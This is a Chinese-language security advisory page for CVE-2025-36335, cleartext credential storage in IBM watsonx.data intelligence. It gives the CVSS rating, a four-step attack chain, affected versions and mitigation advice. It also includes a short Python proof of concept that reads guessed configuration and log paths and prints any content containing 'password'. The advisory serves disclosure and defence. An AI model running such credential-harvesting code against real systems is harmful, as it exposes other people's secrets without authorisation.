IPBUF安全漏洞报告
English
CVE-2025-36335 CVSS 6.2 中危

CVE-2025-36335 IBM watsonx.data凭证明文存储漏洞

披露日期: 2026-04-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-36335
漏洞类型
信息泄露
CVSS评分
6.2 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
IBM watsonx.data intelligence

相关标签

信息泄露凭证明文存储IBM本地攻击CWE-256

漏洞概述

IBM watsonx.data intelligence 在受影响版本中存在严重的安全配置缺陷。该软件在存储用户登录凭证时未采用任何加密措施,直接以明文形式保存在本地文件中。这使得任何拥有本地系统访问权限的攻击者都能轻易读取这些敏感信息,进而可能导致账户被接管或数据泄露,严重威胁系统的安全性。

技术细节

该漏洞源于应用程序在处理敏感数据时的安全机制缺失。IBM watsonx.data intelligence 在特定版本中将用户凭证(如密码)未加密地存储在本地配置文件或日志中。由于攻击向量为本地(AV:L)且无需特权(PR:N),攻击者只需拥有对底层文件系统的读取权限,即可通过简单的文件浏览或搜索命令获取明文凭证。获取凭证后,攻击者可利用合法身份进一步横向移动,完全破坏系统数据的机密性(C:H)。

攻击链分析

STEP 1
访问系统
攻击者获得对运行IBM watsonx.data intelligence服务器的本地访问权限。
STEP 2
定位文件
攻击者遍历文件系统,寻找存储配置信息或日志的目录。
STEP 3
读取凭证
攻击者读取包含明文密码的文件,提取用户凭证。
STEP 4
利用凭证
使用获取的凭证登录系统,窃取数据或提升权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import os # Hypothetical paths where credentials might be stored TARGET_PATHS = [ "/opt/ibm/watsonx/conf/config.properties", "/var/log/ibm/watsonx/setup.log" ] def check_cleartext_creds(): # Check if the target files exist and read them for path in TARGET_PATHS: if os.path.exists(path): print(f"[+] Found file: {path}") try: with open(path, 'r') as f: content = f.read() # Simple check for password keywords if "password" in content.lower(): print("[!] Potential cleartext credentials found!") print("--- Content Snippet ---") print(content[:200]) # Print first 200 chars except Exception as e: print(f"[-] Error reading file: {e}") else: print(f"[-] File not found: {path}") if __name__ == "__main__": print("[*] Scanning for CVE-2025-36335 vulnerability...") check_cleartext_creds()

影响范围

5.2.0
5.2.1
5.3.0
5.3.1

防御指南

临时缓解措施
在未升级修复版本前,应严格限制对IBM watsonx.data安装目录及相关配置文件的访问权限,确保仅授权的服务账户和管理员可以读取。同时,监控系统的异常文件访问行为,防止敏感信息被非授权用户读取。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表